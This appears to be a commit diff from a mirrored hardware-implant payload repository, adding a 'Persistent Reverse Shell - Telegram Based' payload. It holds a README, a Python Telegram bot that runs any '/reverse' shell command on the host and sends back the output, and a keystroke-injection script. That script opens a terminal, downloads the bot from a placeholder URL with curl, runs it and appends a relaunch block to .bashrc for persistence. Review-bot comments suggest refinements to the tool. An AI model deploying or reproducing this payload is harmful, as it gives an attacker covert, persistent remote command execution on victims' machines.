mirror of https://github.com/hak5/omg-payloads.git
Merge pull request #195 from aleff-github/master-3
Persistent Reverse Shell - Telegram Based
commit
65a908980d
|
@ -0,0 +1,41 @@
|
||||||
|
# Persistent Reverse Shell - Telegram Based
|
||||||
|
|
||||||
|
A script used to configure a persistent reverse shell on a Linux computer trough a pre-configured Telegram Bot.
|
||||||
|
|
||||||
|
**Category**: Execution
|
||||||
|
|
||||||
|
## Dependencies
|
||||||
|
|
||||||
|
* Internet Connection
|
||||||
|
|
||||||
|
## Description
|
||||||
|
|
||||||
|
A script used to configure a persistent reverse shell on a Linux computer trough a pre-configured Telegram Bot.
|
||||||
|
|
||||||
|
This payload is based on [Telegram Persistent Connection](Telegram_Persistent_Connection) payload for create the Telegram connection.
|
||||||
|
|
||||||
|
The script accept the `/reverse` command using the format `/reverse <shell_command>` and split `/reverse` from `<shell_command>` trough the `extract_command()` function, then execute the command acquired acquiring the output trough the function `run_command()`.
|
||||||
|
|
||||||
|
Because Telegram uses a limited size per message, the script divides the output of the command into a theoretically infinite chunk of 1000 characters in length that will be sent one by one through the Telegram Bot.
|
||||||
|
|
||||||
|
## Credits
|
||||||
|
|
||||||
|
<h2 align="center"> Aleff :octocat: </h2>
|
||||||
|
<div align=center>
|
||||||
|
<table>
|
||||||
|
<tr>
|
||||||
|
<td align="center" width="96">
|
||||||
|
<a href="https://github.com/aleff-github">
|
||||||
|
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/github.png?raw=true width="48" height="48" />
|
||||||
|
</a>
|
||||||
|
<br>Github
|
||||||
|
</td>
|
||||||
|
<td align="center" width="96">
|
||||||
|
<a href="https://www.linkedin.com/in/alessandro-greco-aka-aleff/">
|
||||||
|
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/linkedin.png?raw=true width="48" height="48" />
|
||||||
|
</a>
|
||||||
|
<br>Linkedin
|
||||||
|
</td>
|
||||||
|
</tr>
|
||||||
|
</table>
|
||||||
|
</div>
|
|
@ -0,0 +1,43 @@
|
||||||
|
from telebot import TeleBot, types
|
||||||
|
import subprocess
|
||||||
|
|
||||||
|
# Set here the Telegram bot token
|
||||||
|
BOT_TOKEN = ""
|
||||||
|
bot = TeleBot(BOT_TOKEN)
|
||||||
|
|
||||||
|
commands = [
|
||||||
|
types.BotCommand("/reverse", "/reverse <shell_command>")
|
||||||
|
]
|
||||||
|
|
||||||
|
bot.set_my_commands(commands=commands)
|
||||||
|
|
||||||
|
@bot.message_handler(commands=['reverse'])
|
||||||
|
def reverse_shell(message):
|
||||||
|
command = extract_command(message.text)
|
||||||
|
if command != "":
|
||||||
|
print(f"Command received: {command}")
|
||||||
|
out = run_command(command)
|
||||||
|
if len(out) > 1000:
|
||||||
|
bot.reply_to(message, "Message too long...")
|
||||||
|
chunk_size = 1000
|
||||||
|
for i in range(0, len(out), chunk_size):
|
||||||
|
bot.send_message(message.chat.id, out[i:i+chunk_size])
|
||||||
|
else:
|
||||||
|
bot.reply_to(message, out)
|
||||||
|
|
||||||
|
def extract_command(message):
|
||||||
|
command_prefix = "/reverse"
|
||||||
|
if message.startswith(command_prefix):
|
||||||
|
return message[len(command_prefix):].strip()
|
||||||
|
else:
|
||||||
|
return None
|
||||||
|
|
||||||
|
def run_command(command):
|
||||||
|
try:
|
||||||
|
result = subprocess.check_output(command, shell=True, text=True)
|
||||||
|
return result.strip()
|
||||||
|
except subprocess.CalledProcessError as e:
|
||||||
|
return f"Some error: {e}"
|
||||||
|
|
||||||
|
|
||||||
|
bot.infinity_polling()
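Review bot: `reverse_shell` hands the text of every `/reverse` message to `subprocess.check_output(command, shell=True, text=True)`, and nothing in the handler checks the sender, so any Telegram account that can reach the bot gets shell execution on the host under the account running the script. The handler should return before `extract_command` unless the chat matches a configured operator, for example `if message.chat.id != ALLOWED_CHAT_ID: return`, with `ALLOWED_CHAT_ID` (a name constructed for this note) defined next to `BOT_TOKEN`. Separately, `extract_command` returns `None` on a prefix mismatch but the caller tests `command != ""`, which lets `None` through to `run_command`; `if command:` covers both cases. `run_command` also passes no `timeout=`, so a command that never exits blocks the handler, and only `CalledProcessError` is caught, so a `subprocess.TimeoutExpired` would need its own handling once a timeout is added.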
|
|
@ -0,0 +1,25 @@
|
||||||
|
REM ############################################################
|
||||||
|
REM # #
|
||||||
|
REM # Title : Persistent Reverse Shell - Telegram Based #
|
||||||
|
REM # Author : Aleff #
|
||||||
|
REM # Version : 1.0 #
|
||||||
|
REM # Category : Execution #
|
||||||
|
REM # Target : Linux #
|
||||||
|
REM # #
|
||||||
|
REM ############################################################
|
||||||
|
|
||||||
|
REM Requirements:
|
||||||
|
REM - Internet Connection
|
||||||
|
|
||||||
|
REM Here you must put your own file link
|
||||||
|
DEFINE #PYTHON-SCRIPT-LINK https://www.example.com/connection.py
|
||||||
|
|
||||||
|
DELAY 1000
|
||||||
|
CTRL-ALT t
|
||||||
|
DELAY 2000
|
||||||
|
|
||||||
|
STRINGLN_BLOCK
|
||||||
|
curl -o connection.py #PYTHON-SCRIPT-LINK; python3 connection.py; echo "if ! pgrep -f connection.py >/dev/null; then
|
||||||
|
python3 connection.py &
|
||||||
|
fi" >> .bashrc; exit
|
||||||
|
END_STRINGLN
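Review bot: The header documents the requirements but not what the `STRINGLN_BLOCK` leaves on the host, which an operator needs for clean-up and a defender needs for triage: a `connection.py` in the terminal's working directory and a `pgrep -f connection.py` block appended to `.bashrc`. I would add a comment such as `REM Leaves behind: ./connection.py and an appended block in .bashrc - remove both after the engagement`. The `>> .bashrc` append is unconditional, so each run adds another copy of the block, which makes that removal harder. The file fetched from `#PYTHON-SCRIPT-LINK` is also executed without any integrity check, so what runs is whatever the URL serves at that moment.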
|